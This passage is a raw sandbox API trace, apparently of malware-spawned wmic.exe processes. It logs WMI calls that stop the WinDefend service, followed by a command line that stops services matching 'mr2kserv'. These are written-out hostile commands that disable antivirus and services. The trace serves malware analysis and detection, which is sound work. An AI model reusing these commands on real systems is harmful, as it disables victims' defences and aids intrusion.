Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=424960537, Attributes=0x50d), (Luid.LowPart=0x0, Luid.HighPart=6384224, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=6357336, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x10000510), (Luid.LowPart=0x0, Luid.HighPart=6410080, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0250.685] free (_Block=0x61cf80) [0250.685] CloseHandle (hObject=0x298) returned 1 [0250.685] lstrlenW (lpString="GET") returned 3 [0250.685] lstrlenW (lpString="call") returned 4 [0250.685] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0250.686] lstrlenW (lpString="LIST") returned 4 [0250.686] lstrlenW (lpString="call") returned 4 [0250.686] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0250.686] lstrlenW (lpString="SET") returned 3 [0250.686] lstrlenW (lpString="call") returned 4 [0250.686] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0250.686] lstrlenW (lpString="CALL") returned 4 [0250.686] lstrlenW (lpString="call") returned 4 [0250.686] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0250.686] ??0CHString@@QEAA@XZ () returned 0x26f3f0 [0250.686] GetCurrentThreadId () returned 0xdc [0250.686] malloc (_Size=0x18) returned 0x61cca0 [0250.686] malloc (_Size=0x18) returned 0x61ccc0 [0250.686] malloc (_Size=0x18) returned 0x61cce0 [0250.686] malloc (_Size=0x18) returned 0x61cd00 [0250.686] malloc (_Size=0x18) returned 0x61d550 [0250.686] SysStringLen (param_1="\\\\") returned 0x2 [0250.686] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0250.687] malloc (_Size=0x18) returned 0x61d570 [0250.687] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0250.687] SysStringLen (param_1="\\") returned 0x1 [0250.687] malloc (_Size=0x18) returned 0x61d590 [0250.687] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0250.687] SysStringLen (param_1="root\\cimv2") returned 0xa [0250.687] free (_Block=0x61d570) [0250.687] free (_Block=0x61d550) [0250.687] free (_Block=0x61cd00) [0250.687] free (_Block=0x61cce0) [0250.687] free (_Block=0x61ccc0) [0250.687] free (_Block=0x61cca0) [0250.687] malloc (_Size=0x18) returned 0x61cca0 [0250.687] malloc (_Size=0x18) returned 0x61ccc0 [0250.687] malloc (_Size=0x18) returned 0x61cce0 [0250.688] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e91390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffeb29d0 | out: ppNamespace=0xffeb29d0*=0x1ea3b28) returned 0x0 [0250.691] free (_Block=0x61cce0) [0250.691] free (_Block=0x61ccc0) [0250.691] free (_Block=0x61cca0) [0250.691] CoSetProxyBlanket (pProxy=0x1ea3b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0250.691] free (_Block=0x61d590) [0250.691] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0250.692] ??0CHString@@QEAA@XZ () returned 0x26f198 [0250.692] GetCurrentThreadId () returned 0xdc [0250.692] malloc (_Size=0x70) returned 0x61cf80 [0250.692] malloc (_Size=0x50) returned 0x61d000 [0250.692] malloc (_Size=0x50) returned 0x61d060 [0250.692] malloc (_Size=0x70) returned 0x61d0c0 [0250.692] malloc (_Size=0x70) returned 0x61d140 [0250.692] malloc (_Size=0x48) returned 0x61d1c0 [0250.692] malloc (_Size=0x18) returned 0x61cca0 [0250.692] lstrlenA (lpString="") returned 0 [0250.692] malloc (_Size=0x2) returned 0x616a60 [0250.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffe4314c, cbMultiByte=-1, lpWideCharStr=0x616a60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0250.692] free (_Block=0x616a60) [0250.692] malloc (_Size=0x70) returned 0x61d210 [0250.692] malloc (_Size=0x48) returned 0x61d290 [0250.692] malloc (_Size=0x18) returned 0x61ccc0 [0250.692] free (_Block=0x61cca0) [0250.692] IWbemServices:GetObject (in: This=0x1ea3b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x26f1c8*=0x0, ppCallResult=0x0 | out: ppObject=0x26f1c8*=0x1ecc030, ppCallResult=0x0) returned 0x0 [0250.711] malloc (_Size=0x18) returned 0x61cca0 [0250.711] IWbemClassObject:GetMethod (in: This=0x1ecc030, wszName="stopservice", lFlags=0, ppInSignature=0x26f1c0, ppOutSignature=0x26f1d8 | out: ppInSignature=0x26f1c0*=0x0, ppOutSignature=0x26f1d8*=0x1ecc530) returned 0x0 [0250.711] free (_Block=0x61cca0) [0250.711] IUnknown:Release (This=0x1ecc530) returned 0x0 [0250.712] IUnknown:Release (This=0x1ecc030) returned 0x0 [0250.712] ??0CHString@@QEAA@XZ () returned 0x26efe0 [0250.712] GetCurrentThreadId () returned 0xdc [0250.712] malloc (_Size=0x18) returned 0x61cca0 [0250.712] lstrlenA (lpString="") returned 0 [0250.712] malloc (_Size=0x2) returned 0x616a60 [0250.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffe4314c, cbMultiByte=-1, lpWideCharStr=0x616a60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0250.712] free (_Block=0x616a60) [0250.712] malloc (_Size=0x18) returned 0x61cce0 [0250.712] lstrlenA (lpString="") returned 0 [0250.712] malloc (_Size=0x2) returned 0x616a60 [0250.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffe4314c, cbMultiByte=-1, lpWideCharStr=0x616a60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0250.712] free (_Block=0x616a60) [0250.712] malloc (_Size=0x18) returned 0x61cd00 [0250.712] free (_Block=0x61cce0) [0250.712] malloc (_Size=0x18) returned 0x61cce0 [0250.712] lstrlenA (lpString="SELECT * FROM ") returned 14 [0250.712] malloc (_Size=0x1e) returned 0x61d2e0 [0250.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffe44a40, cbMultiByte=-1, lpWideCharStr=0x61d2e0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0250.713] free (_Block=0x61d2e0) [0250.713] malloc (_Size=0x18) returned 0x61d550 [0250.713] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0250.713] SysStringLen (param_1="Win32_Service") returned 0xd [0250.713] free (_Block=0x61cce0) [0250.713] malloc (_Size=0x18) returned 0x61cce0 [0250.713] malloc (_Size=0x18) returned 0x61d570 [0250.713] lstrlenA (lpString=" WHERE ") returned 7 [0250.713] malloc (_Size=0x10) returned 0x61d590 [0250.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffe43e20, cbMultiByte=-1, lpWideCharStr=0x61d590, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0250.713] free (_Block=0x61d590) [0250.713] malloc (_Size=0x18) returned 0x61d590 [0250.713] SysStringLen (param_1=" WHERE ") returned 0x7 [0250.713] SysStringLen (param_1="name like '%%WinDefend%%'") returned 0x19 [0250.713] malloc (_Size=0x18) returned 0x61d5b0 [0250.713] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0250.713] SysStringLen (param_1=" WHERE name like '%%WinDefend%%'") returned 0x20 [0250.713] free (_Block=0x61d550) [0250.714] free (_Block=0x61d590) [0250.714] free (_Block=0x61d570) [0250.714] free (_Block=0x61cce0) [0250.714] malloc (_Size=0x18) returned 0x61cce0 [0250.714] IWbemServices:ExecQuery (in: This=0x1ea3b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%WinDefend%%'", lFlags=48, pCtx=0x0, ppEnum=0x26efc8 | out: ppEnum=0x26efc8*=0x1ea3c28) returned 0x0 [0250.721] free (_Block=0x61cce0) [0250.721] CoSetProxyBlanket (pProxy=0x1ea3c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0250.746] IEnumWbemClassObject:Next (in: This=0x1ea3c28, lTimeout=-1, uCount=0x1, apObjects=0x26efd0, puReturned=0x26f158 | out: apObjects=0x26efd0*=0x1ea3c90, puReturned=0x26f158*=0x1) returned 0x0 [0251.134] IWbemClassObject:Get (in: This=0x1ea3c90, wszName="__PATH", lFlags=0, pVal=0x26f060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f060*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Service.Name=\"WinDefend\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0251.134] malloc (_Size=0x18) returned 0x61cce0 [0251.134] ??0CHString@@QEAA@XZ () returned 0x26e658 [0251.134] GetCurrentThreadId () returned 0xdc [0251.134] LoadStringW (in: hInstance=0x0, uID=0xb7ea, lpBuffer=0x26ddb0, cchBufferMax=1024 | out: lpBuffer="Executing (%1)->%2()\r\n") returned 0x16 [0251.135] FormatMessageW (in: dwFlags=0x2500, lpSource=0x26ddb0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26dd80, nSize=0x0, Arguments=0x26dd88 | out: lpBuffer="㏰E") returned 0x52 [0251.135] malloc (_Size=0x18) returned 0x61d570 [0251.135] LocalFree (hMem=0x4533f0) returned 0x0 [0251.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\XDUWTFONO\\root\\cimv2:Win32_Service.Name=\"WinDefend\")->stopservice()\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0251.135] malloc (_Size=0x53) returned 0x61d2e0 [0251.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\XDUWTFONO\\root\\cimv2:Win32_Service.Name=\"WinDefend\")->stopservice()\r\n", cchWideChar=-1, lpMultiByteStr=0x61d2e0, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Executing (\\\\XDUWTFONO\\root\\cimv2:Win32_Service.Name=\"WinDefend\")->stopservice()\r\n", lpUsedDefaultChar=0x0) returned 83 [0251.135] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffeb2ab0 [0251.135] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 82 [0251.135] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0251.136] free (_Block=0x61d2e0) [0251.136] free (_Block=0x61d570) [0251.136] malloc (_Size=0x18) returned 0x61d570 [0251.136] IWbemServices:ExecMethod (in: This=0x1ea3b28, strObjectPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Service.Name=\"WinDefend\"", strMethodName="stopservice", lFlags=0, pCtx=0x0, pInParams=0x0, ppOutParams=0x26e638*=0x0, ppCallResult=0x0 | out: ppOutParams=0x26e638*=0x1ea40a0, ppCallResult=0x0) returned 0x0 [0251.231] free (_Block=0x61d570) [0251.231] malloc (_Size=0x800) returned 0x61edf0 [0251.231] LoadStringW (in: hInstance=0x0, uID=0xb3b3, lpBuffer=0x61edf0, cchBufferMax=1024 | out: lpBuffer="Method execution successful.\r\n") returned 0x1e [0251.231] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0251.231] malloc (_Size=0x1f) returned 0x61d2e0 [0251.231] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x61d2e0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Method execution successful.\r\n", lpUsedDefaultChar=0x0) returned 31 [0251.231] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffeb2ab0 [0251.231] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 30 [0251.231] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0251.231] free (_Block=0x61d2e0) [0251.231] free (_Block=0x61edf0) [0251.231] IUnknown:AddRef (This=0x1ea40a0) returned 0x2 [0251.231] ??0CHString@@QEAA@XZ () returned 0x26e5f8 [0251.231] GetCurrentThreadId () returned 0xdc [0251.231] IWbemClassObject:GetObjectText (in: This=0x1ea40a0, lFlags=0, pstrObjectText=0x26e5f0 | out: pstrObjectText=0x26e5f0*="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 0;\n};\n") returned 0x0 [0251.232] malloc (_Size=0x800) returned 0x61edf0 [0251.232] LoadStringW (in: hInstance=0x0, uID=0xb7f7, lpBuffer=0x61edf0, cchBufferMax=1024 | out: lpBuffer="Out Parameters:") returned 0xf [0251.232] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0251.232] malloc (_Size=0x10) returned 0x61d570 [0251.232] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x61d570, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Out Parameters:", lpUsedDefaultChar=0x0) returned 16 [0251.232] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffeb2ab0 [0251.232] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 15 [0251.232] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0251.232] free (_Block=0x61d570) [0251.232] free (_Block=0x61edf0) [0251.232] malloc (_Size=0x18) returned 0x61d570 [0251.232] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 0;\n};\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0251.232] malloc (_Size=0x32) returned 0x618640 [0251.232] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 0;\n};\n", cchWideChar=-1, lpMultiByteStr=0x618640, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 0;\n};\n", lpUsedDefaultChar=0x0) returned 50 [0251.232] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffeb2ab0 [0251.232] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 49 [0251.232] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0251.232] free (_Block=0x618640) [0251.233] free (_Block=0x61d570) [0251.233] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0251.233] malloc (_Size=0x2) returned 0x616a60 [0251.233] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x616a60, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 2 [0251.233] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffeb2ab0 [0251.233] fprintf (in: _File=0x7fefdf72ae0, _Format="%s" | out: _File=0x7fefdf72ae0) returned 1 [0251.233] fflush (in: _File=0x7fefdf72ae0 | out: _File=0x7fefdf72ae0) returned 0 [0251.233] free (_Block=0x616a60) [0251.233] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.233] IUnknown:Release (This=0x1ea40a0) returned 0x1 [0251.233] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.233] free (_Block=0x61cce0) [0251.234] IUnknown:Release (This=0x1ea3c90) returned 0x0 [0251.234] IEnumWbemClassObject:Next (in: This=0x1ea3c28, lTimeout=-1, uCount=0x1, apObjects=0x26efd0, puReturned=0x26f158 | out: apObjects=0x26efd0*=0x0, puReturned=0x26f158*=0x0) returned 0x1 [0251.236] IUnknown:Release (This=0x1ea3c28) returned 0x0 [0251.243] free (_Block=0x61d5b0) [0251.243] free (_Block=0x61cd00) [0251.243] free (_Block=0x61cca0) [0251.243] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.243] free (_Block=0x61ccc0) [0251.243] free (_Block=0x61d1c0) [0251.243] free (_Block=0x61d140) [0251.243] free (_Block=0x61d0c0) [0251.244] free (_Block=0x61d060) [0251.244] free (_Block=0x61d000) [0251.244] free (_Block=0x61d290) [0251.244] free (_Block=0x61d210) [0251.244] free (_Block=0x61cf80) [0251.244] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.244] GetCurrentThreadId () returned 0xdc [0251.244] ??0CHString@@QEAA@PEBG@Z () returned 0x26f4e8 [0251.244] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x26f4e8 [0251.244] lstrlenW (lpString="LIST") returned 4 [0251.244] lstrlenW (lpString="call") returned 4 [0251.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0251.244] lstrlenW (lpString="ASSOC") returned 5 [0251.244] lstrlenW (lpString="call") returned 4 [0251.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0251.244] lstrlenW (lpString="GET") returned 3 [0251.244] lstrlenW (lpString="call") returned 4 [0251.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0251.244] ??1CHString@@QEAA@XZ () returned 0x34546201 [0251.244] WbemLocator:IUnknown:Release (This=0x1ea3b28) returned 0x0 [0251.246] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0251.246] _kbhit () returned 0x0 [0251.247] free (_Block=0x61cf60) [0251.247] free (_Block=0x61cb00) [0251.247] free (_Block=0x61cae0) [0251.247] free (_Block=0x61cac0) [0251.247] free (_Block=0x61caa0) [0251.247] free (_Block=0x61cdc0) [0251.247] free (_Block=0x617150) [0251.248] free (_Block=0x61cf00) [0251.248] free (_Block=0x618680) [0251.248] free (_Block=0x61cba0) [0251.248] free (_Block=0x61cbc0) [0251.248] free (_Block=0x616eb0) [0251.248] free (_Block=0x61d4d0) [0251.248] free (_Block=0x61cbe0) [0251.248] free (_Block=0x61cc40) [0251.248] free (_Block=0x61d450) [0251.248] free (_Block=0x61d3d0) [0251.248] free (_Block=0x61cc20) [0251.248] free (_Block=0x61cc00) [0251.248] free (_Block=0x61cc60) [0251.248] free (_Block=0x61d370) [0251.248] IUnknown:Release (This=0x1ea40a0) returned 0x0 [0251.248] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0251.248] free (_Block=0x61ce60) [0251.248] free (_Block=0x61cb40) [0251.248] free (_Block=0x61cf30) [0251.248] free (_Block=0x61cb80) [0251.248] free (_Block=0x618600) [0251.248] free (_Block=0x61cb60) [0251.248] free (_Block=0x61cb20) [0251.249] free (_Block=0x617f80) [0251.249] free (_Block=0x616990) [0251.249] free (_Block=0x6169e0) [0251.249] free (_Block=0x61cc80) [0251.249] free (_Block=0x616ad0) [0251.249] free (_Block=0x616e90) [0251.249] free (_Block=0x618040) [0251.249] free (_Block=0x616e70) [0251.249] free (_Block=0x618000) [0251.249] free (_Block=0x616e10) [0251.249] free (_Block=0x616e30) [0251.249] free (_Block=0x616cf0) [0251.249] free (_Block=0x616d10) [0251.249] free (_Block=0x616c90) [0251.249] free (_Block=0x616cb0) [0251.249] free (_Block=0x616d50) [0251.249] free (_Block=0x616d70) [0251.249] free (_Block=0x616db0) [0251.249] free (_Block=0x616dd0) [0251.249] free (_Block=0x616bd0) [0251.249] free (_Block=0x616bf0) [0251.249] free (_Block=0x616b70) [0251.250] free (_Block=0x616b90) [0251.250] free (_Block=0x616c30) [0251.250] free (_Block=0x616c50) [0251.250] free (_Block=0x616b10) [0251.250] free (_Block=0x616b30) [0251.250] free (_Block=0x616a80) [0251.250] free (_Block=0x616a30) [0251.250] free (_Block=0x61cd30) [0251.250] WbemLocator:IUnknown:Release (This=0x1e91390) returned 0x2 [0251.250] WbemLocator:IUnknown:Release (This=0x1ea3a98) returned 0x0 [0251.252] WbemLocator:IUnknown:Release (This=0x1e91390) returned 0x1 [0251.252] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0251.252] WbemLocator:IUnknown:Release (This=0x1e91390) returned 0x0 [0251.252] free (_Block=0x61ca20) [0251.252] free (_Block=0x61ca40) [0251.252] free (_Block=0x618540) [0251.252] free (_Block=0x61ca60) [0251.253] free (_Block=0x61ca80) [0251.253] free (_Block=0x618580) [0251.253] free (_Block=0x61c8a0) [0251.253] free (_Block=0x61c8c0) [0251.253] free (_Block=0x6183c0) [0251.253] free (_Block=0x61c8e0) [0251.253] free (_Block=0x61c900) [0251.253] free (_Block=0x618400) [0251.253] free (_Block=0x61c820) [0251.253] free (_Block=0x61c840) [0251.253] free (_Block=0x618340) [0251.253] free (_Block=0x61c860) [0251.253] free (_Block=0x61c880) [0251.253] free (_Block=0x618380) [0251.253] free (_Block=0x61c9a0) [0251.253] free (_Block=0x61c9c0) [0251.253] free (_Block=0x6184c0) [0251.253] free (_Block=0x61c9e0) [0251.253] free (_Block=0x61ca00) [0251.254] free (_Block=0x618500) [0251.254] free (_Block=0x61c7a0) [0251.254] free (_Block=0x61c7c0) [0251.254] free (_Block=0x6182c0) [0251.254] free (_Block=0x61c7e0) [0251.254] free (_Block=0x61c800) [0251.254] free (_Block=0x618300) [0251.254] free (_Block=0x61c920) [0251.254] free (_Block=0x61c940) [0251.254] free (_Block=0x618440) [0251.254] free (_Block=0x61c960) [0251.254] free (_Block=0x61c980) [0251.254] free (_Block=0x618480) [0251.254] free (_Block=0x61c6e0) [0251.254] free (_Block=0x61c700) [0251.254] free (_Block=0x618200) [0251.254] free (_Block=0x61c5a0) [0251.254] free (_Block=0x61c5c0) [0251.254] free (_Block=0x6180c0) [0251.254] free (_Block=0x61c560) [0251.255] free (_Block=0x61c580) [0251.255] free (_Block=0x618080) [0251.255] free (_Block=0x61c620) [0251.255] free (_Block=0x61c640) [0251.255] free (_Block=0x618140) [0251.255] free (_Block=0x61c720) [0251.255] free (_Block=0x61c740) [0251.255] free (_Block=0x618240) [0251.255] free (_Block=0x61c5e0) [0251.255] free (_Block=0x61c600) [0251.255] free (_Block=0x618100) [0251.255] free (_Block=0x61c660) [0251.255] free (_Block=0x61c680) [0251.255] free (_Block=0x618180) [0251.255] free (_Block=0x61c6a0) [0251.255] free (_Block=0x61c6c0) [0251.255] free (_Block=0x6181c0) [0251.255] free (_Block=0x61c760) [0251.255] free (_Block=0x61c780) [0251.255] free (_Block=0x618280) [0251.256] CoUninitialize () [0251.299] exit (_Code=0) [0251.299] free (_Block=0x616f00) [0251.299] free (_Block=0x617f40) [0251.299] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.300] free (_Block=0x616ff0) [0251.300] free (_Block=0x616af0) [0251.300] free (_Block=0x617f00) [0251.300] free (_Block=0x617ec0) [0251.300] free (_Block=0x617e70) [0251.300] free (_Block=0x617e30) [0251.300] free (_Block=0x615ac0) [0251.300] free (_Block=0x617db0) [0251.300] free (_Block=0x615a80) [0251.300] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.300] free (_Block=0x6185c0) Thread: id = 196 os_tid = 0xe0 Thread: id = 197 os_tid = 0xe4 Thread: id = 198 os_tid = 0xe8 Thread: id = 199 os_tid = 0xec Thread: id = 200 os_tid = 0xba0 Process: id = "24" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x1b6aa000" os_pid = "0x5e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 202 os_tid = 0xb18 [0251.496] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fdd0 | out: lpSystemTimeAsFileTime=0x24fdd0*(dwLowDateTime=0xab974520, dwHighDateTime=0x1d61d49)) [0251.496] GetCurrentProcessId () returned 0x5e4 [0251.496] GetCurrentThreadId () returned 0xb18 [0251.496] GetTickCount () returned 0x11689e8 [0251.496] QueryPerformanceCounter (in: lpPerformanceCount=0x24fdd8 | out: lpPerformanceCount=0x24fdd8*=37166961290) returned 1 [0251.503] GetModuleHandleW (lpModuleName=0x0) returned 0xffc20000 [0251.504] __set_app_type (_Type=0x1) [0251.504] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc6ced0) returned 0x0 [0251.505] __wgetmainargs (in: _Argc=0xffc92380, _Argv=0xffc92390, _Env=0xffc92388, _DoWildCard=0, _StartInfo=0xffc9239c | out: _Argc=0xffc92380, _Argv=0xffc92390, _Env=0xffc92388) returned 0 [0251.505] ??0CHString@@QEAA@XZ () returned 0xffc92ab0 [0251.505] malloc (_Size=0x30) returned 0x435a80 [0251.506] malloc (_Size=0x70) returned 0x437da0 [0251.506] malloc (_Size=0x50) returned 0x435ac0 [0251.506] malloc (_Size=0x30) returned 0x437e20 [0251.506] malloc (_Size=0x48) returned 0x437e60 [0251.506] malloc (_Size=0x30) returned 0x437eb0 [0251.506] malloc (_Size=0x30) returned 0x437ef0 [0251.506] ??0CHString@@QEAA@XZ () returned 0xffc92f58 [0251.506] malloc (_Size=0x30) returned 0x437f30 [0251.506] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0251.506] SetConsoleCtrlHandler (HandlerRoutine=0xffc65724, Add=1) returned 1 [0251.506] _onexit (_Func=0xffc7f378) returned 0xffc7f378 [0251.507] _onexit (_Func=0xffc7f490) returned 0xffc7f490 [0251.507] _onexit (_Func=0xffc7f4d0) returned 0xffc7f4d0 [0251.507] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0251.507] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0251.512] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0251.528] CoCreateInstance (in: rclsid=0xffc273a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc27370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, 